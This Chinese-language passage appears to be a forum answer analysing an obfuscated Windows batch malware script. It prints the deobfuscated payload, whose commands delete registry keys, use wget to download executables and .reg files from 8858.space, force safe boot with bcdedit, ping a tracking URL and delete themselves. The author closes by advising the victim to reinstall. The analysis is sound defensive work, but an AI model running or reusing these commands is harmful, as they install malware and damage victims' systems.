第二个块扩展为 'set' 命令,用 %j% 和 %a3% 代替 'e' 和 't':
set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"
到目前为止,您应该意识到它是一种混淆技术,可以扩展为它想在您的系统上运行的脚本。在脚本开头插入setlocal并用echo解除有害行以提取含义:
for /f "usebackq delims=" %i in ("s.txt") do set %~i
set "title="
set "sub="
set "pos="
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" /f /reg:32
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/e.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/usw.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/at.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/ct.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/et.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s C:\WINDOWS\c.reg
bcdedit /set "{current}" safeboot "minimal"
del C:\WINDOWS\b.exe
del C:\WINDOWS\c.reg
C:\WINDOWS\curl\curl.exe "http://8858.space/curl/runi.php?subid=_" --referer "alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/y.txt" --referer="alpha"
del b.bat
失去了一些意义,比如可能在 s.txt 中定义的title、sub和pos变量——但它的作用非常清楚:它修改了您的注册表和启动配置,下载了更多的恶意软件并自行删除。如果这在我的电脑上运行,我会备份我的东西,格式化并重新安装。